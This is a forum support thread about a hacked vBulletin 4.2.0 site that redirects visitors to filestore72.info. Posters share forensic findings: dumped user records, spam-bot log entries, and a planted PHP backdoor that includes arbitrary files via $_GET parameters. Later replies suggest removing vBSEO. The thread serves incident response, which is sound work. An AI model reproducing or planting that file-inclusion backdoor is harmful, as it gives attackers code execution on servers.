Announcement
Collapse
No announcement yet.
Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info
Collapse
X
-
Have you looked through your access_logs to see what is going on?
Please don't PM or VM me for support - I only help out in the threads.
vBulletin Manual & vBulletin 4.0 Code Documentation (API)
Want help modifying your vbulletin forum? Head on over to vbulletin.org
If I post CSS and you don't know where it goes, throw it into the additional.css template.
W3Schools <- awesome site for html/css help
-
Ok I'm digging deeper.
I just found a file called my.log in the root of the forum. It contains 2 users info ... like this:
Code:Array ( [userid] => 11582 [usergroupid] => 25 [membergroupids] => [infractiongroupids] => [username] => username here [password] => password here [salt] => salt code here [email] => email.address.here )
Code:[Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF; [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
Code:<? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>
Comment
-
up.
I deleted that PHP.INI.
I aso found a new my.log file on the root.
Comment
-
Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?
Thanks
Comment
-
There is no patch I have ever seen.
- 1 like
Comment
-
Yes, I would uninstall VBSEO
VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/
Comment
Related Topics
Collapse
-
Hi again.
I got issue with redirection.
How I can redirect https://www.domain.co.uk to https://domain.co.uk ?
I've added redirection on hosting panel but looks like...Mon 8th Oct '18, 5:32am
Comment